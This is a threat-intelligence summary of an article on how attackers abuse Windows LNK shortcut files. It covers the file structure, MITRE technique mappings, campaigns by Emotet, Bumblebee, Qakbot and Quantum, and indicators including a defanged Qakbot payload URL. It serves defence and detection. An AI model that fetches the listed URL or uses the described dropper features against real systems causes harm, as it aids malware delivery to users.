LNK (Shell Link) files are Windows shortcuts that threat actors increasingly abuse to execute binaries and stage attacks, including delivering payloads via PowerShell, VBScript, or MSHTA. The article explains the LNK file format, how attackers leverage it in stages (delivery, downloader, and loader), and how defenders can analyze and detect malicious LNKs using open-source tools like LnkParse3. #Bumblebee #Quantum #Emotet #Qakbot
Keypoints
- The LNK file format comprises five structures (ShellLinkHeader, LINKTARGET_IDLIST, LINKINFO, STRING_DATA, EXTRA_DATA) with mandatory and optional components that help identify suspicious files.
- Shell Link structures expose parameters that can reveal suspicious activity, such as HasRelativePath, FileAttributesFlags, and times for incident response context.
- LNK files can execute a target with arguments, enabling attackers to run PowerShell, VBScript, or MSHTA, or to invoke commands from accompanying dropped files.
- Threat actors use LNKs primarily in the delivery stage to deploy or execute malware, including as downloaders that fetch subsequent payloads.
- Examples include Emotet delivering LNKs via phishing with password-protected archives and Bumblebee using LNKs to load payloads in two variants (ISO with DLL and PowerShell with a second stage).
- Quantum has a tool to generate malicious LNKs with capabilities like UAC bypass, delayed execution, post-execution hiding, and double extensions, highlighting evolving LNK-based abuse.
MITRE Techniques
- [T1059.001] PowerShell – LNK files are set to execute PowerShell with predefined arguments: “LNK files are set to execute either PowerShell, VBScript, or MSHTA with pre-defined arguments or execute commands from another file that is dropped with the LNK file.”
- [T1059.005] VBScript – LNK files are set to execute VBScript with predefined arguments: “…LNK files are set to execute either PowerShell, VBScript, or MSHTA with pre-defined arguments…”
- [T1059.007] MSHTA – LNK files can trigger MSHTA with predefined arguments: “…LNK files are set to execute either PowerShell, VBScript, or MSHTA with pre-defined arguments…”
- [T1566.001] Phishing: Spearphishing Attachment – Emotet used phishing with a password-protected zip containing an LNK disguised as a Word document that executes a VBS script which downloads malware.
- [T1105] Ingress Tool Transfer – Qakbot LNK downloads a DLL from a remote location and executes it. “It downloads a DLL from a remote location and executes it.”
- [T1548.002] Abusing Elevation Control: Bypass User Account Control – Quantum’s LNK tooling includes UAC bypass, delayed execution, post-execution hiding, and double extensions. “…such as UAC bypass, delayed execution, post-execution hiding, and a variety of double extensions.”
- [T1036] Masquerading – The use of double extensions to hide its true nature. “…a variety of double extensions.”
Indicators of Compromise
- [URL] context – https://news-wellness[.]com/5MVhfo8BnDub/D.png – used in the Qakbot-related LNK to download a payload from a remote location.
- [File Path] context – C:WindowsSystem32WindowsPowerShellv1.0powershell.exe, C:WindowsSystem32rundll32.exe – executables commonly invoked by malicious LNKs to run scripts or load DLLs.
- [MAC Address] context – MAC address of the machine where the link target was last seen – used to determine if the LNK was created on a different host.
Read more: https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/